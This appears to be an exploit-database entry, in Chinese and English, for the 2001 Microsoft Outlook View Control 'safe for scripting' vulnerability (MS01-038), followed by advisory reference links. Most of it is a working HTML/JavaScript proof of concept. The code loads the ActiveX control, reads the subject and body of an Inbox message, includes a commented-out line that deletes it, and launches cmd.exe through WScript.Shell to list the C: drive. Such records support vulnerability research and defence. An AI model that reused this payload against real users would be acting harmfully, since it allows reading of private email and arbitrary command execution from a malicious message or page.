https://www.exploit-db.com/exploits/21003
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200108-053

MicrosoftOutlook2002版本及之前版本中的MicrosoftOutlookViewActiveXControl存在漏洞。远程攻击者可以借助畸形HTML电子邮件消息或网页执行任意命令。

source: http://www.securityfocus.com/bid/3025/info

Microsoft Outlook introduces a vulnerability that may allow attackers to access and manipulate user email.

The vulnerability is due to a new ActiveX control called 'Microsoft Outlook View Control'. The flaw is that this control is marked 'safe for scripting' when it should not be. It is therefore accessible by scripts.

Scripts can access and perform operations on user email through this control without user knowledge or consent. 

This assumes you have at least one message in Outlook XP's Inbox
<br>
<object id="o1"
classid="clsid:0006F063-0000-0000-C000-000000000046"
>
<param name="folder" value="Inbox">
</object>

<script>
function f()
{
//alert(o2.object);
sel=o1.object.selection;
vv1=sel.Item(1);
alert("Subject="+vv1.Subject);
alert("Body="+vv1.Body+"["+vv1.HTMLBody+"]");
alert("May be deleted");
//vv1.Delete();

vv2=vv1.Session.Application.CreateObject("WScript.Shell");

alert("Much more fun is possible");


vv2.Run("C:\WINNT\SYSTEM32\CMD.EXE /c DIR /A /P /S C:\ ");

}
setTimeout("f()",2000);
</script>

来源:US-CERTVulnerabilityNote:VU#131569
名称:VU#131569
链接:http://www.kb.cert.org/vuls/id/131569
来源:MS
名称:MS01-038
链接:http://www.microsoft.com/technet/security/bulletin/MS01-038.asp
来源:BUGTRAQ
名称:20010712MSOfficeXP-themoremoneyIgivetoMicrosoft,themorevulnerablemyWindowscomputersare
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=99496431214078&w;=2
来源:XF
名称:outlook-activex-view-control(6831)
链接:http://xforce.iss.net/static/6831.php
来源:BID
名称:3025
链接:http://www.securityfocus.com/bid/3025
来源:NTBUGTRAQ
名称:20010712VulnerabilityinIE/OutlookActiveXcontrol
链接:http://www.ntbugtraq.com/default.asp?pid=36&sid;=1&A2;=ind0107&L;=ntbugtraq&F;=P&S;=&P;=862
来源:CIAC
名称:L-113
链接:http://www.ciac.org/ciac/bulletins/l-113.shtml